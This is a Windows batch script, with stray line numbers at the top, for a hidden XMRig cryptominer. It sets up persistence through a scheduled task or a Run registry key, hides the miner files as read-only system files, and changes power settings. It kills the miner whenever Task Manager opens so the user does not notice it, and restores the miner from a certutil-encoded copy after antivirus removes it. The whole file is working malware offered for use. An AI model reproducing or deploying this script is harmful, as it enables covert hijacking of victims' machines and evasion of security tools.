123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990
@ECHO OFF
:start_loop
goto :admin_check
REM Check if we have admin or user permissions.
:admin_check
net session >nul 2>&1
if "%ERRORLEVEL%"=="0" (
goto :schtask_su
) else (
goto :regkey_su
)
REM If we have admin then install startup to SchTasks.
:schtask_su
schtasks /query /TN "XMRig_Miner" >NUL 2>&1 || schtasks /create /tn "XMRig_Miner" /sc ONLOGON /tr "%PUBLIC%\Windows\xmrig.vbs"
REG QUERY "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "XMRig_Miner" >nul 2>&1
if "%ERRORLEVEL%"=="0" (
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "XMRig_Miner" /F
goto :go_ninja
) else (
goto :go_ninja
)
REM If we do not have admin then install startup to Registry.
:regkey_su
REG QUERY "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "XMRig_Miner" >nul 2>&1
if "%ERRORLEVEL%"=="1" (
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "XMRig_Miner" /t REG_SZ /F /D "%PUBLIC%\Windows\xmrig.vbs"
goto :go_ninja
) else (
goto :go_ninja
)
REM Hide all files as system files and make them read-only.
:go_ninja
attrib +h +s +r "%PUBLIC%\Windows\xmrig.vbs"
attrib +h +s +r "%PUBLIC%\Windows\xmrig.bat"
attrib +h +s +r "%PUBLIC%\Windows\xmrig.exe"
attrib +h +s +r "%PUBLIC%\Windows\xmrig.txt"
REM Set all power schemes to not sleep.
for /f "tokens=4 delims= " %%i IN ('powercfg -q ^| find "Power Scheme GUID:"') do Set StrOne=%%i
for /f "tokens=3 delims= " %%i IN ('powercfg -q ^| find "(Power buttons and lid)"') do Set StrTwo=%%i
for /f "tokens=4 delims= " %%i IN ('powercfg -q ^| find "(Lid close action)"') do Set StrThree=%%i
powercfg -SETACVALUEINDEX %StrOne% %StrTwo% %StrThree% 000
REM Watch Taskmgr and if opened, kill miner.
:taskmgr_killswitch
tasklist /FI "IMAGENAME eq Taskmgr.exe" 2>NUL | find /I /N "Taskmgr.exe">NUL
if "%ERRORLEVEL%"=="0" goto :kill_miner
:taskmgr_respawn
tasklist /FI "IMAGENAME eq Taskmgr.exe" 2>NUL | find /I /N "Taskmgr.exe">NUL
if "%ERRORLEVEL%"=="1" goto :check_miner
REM Check if miner process is running.
:check_miner
tasklist /FI "IMAGENAME eq xmrig.exe" 2>NUL | find /I /N "xmrig.exe">NUL
if "%ERRORLEVEL%"=="0" goto :start_loop
:dead_miner
tasklist /FI "IMAGENAME eq xmrig.exe" 2>NUL | find /I /N "xmrig.exe">NUL
if "%ERRORLEVEL%"=="1" (
goto :recover_miner
)
REM If miner has been deleted by AV, recover miner from backup and start again.
:recover_miner
if exist %PUBLIC%\Windows\xmrig.exe (
Start %PUBLIC%\Windows\xmrig.exe --donate-level=1 -B -o MINING_POOL:PORT -u PUBLIC_WALLET -p x -k
goto :start_loop
) else (
certutil -decode %PUBLIC%\Windows\xmrig.txt %PUBLIC%\Windows\xmrig.exe
goto :start_loop
)
REM Taskmgr has been opened, kill miner and wait 5 minutes to check again.
:kill_miner
tasklist /FI "IMAGENAME eq xmrig.exe" 2>NUL | find /I /N "xmrig.exe">NUL
if "%ERRORLEVEL%"=="0" (
taskkill -f -im xmrig.exe
TIMEOUT 300
goto :admin_check
)
goto :start_loop